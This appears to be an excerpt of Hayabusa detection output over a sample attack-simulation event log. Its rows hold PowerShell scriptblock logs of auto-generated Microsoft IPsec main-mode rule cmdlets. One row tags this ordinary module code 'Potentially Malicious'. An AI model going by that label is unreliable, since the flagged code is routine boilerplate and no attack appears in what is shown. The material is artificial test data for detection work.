[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 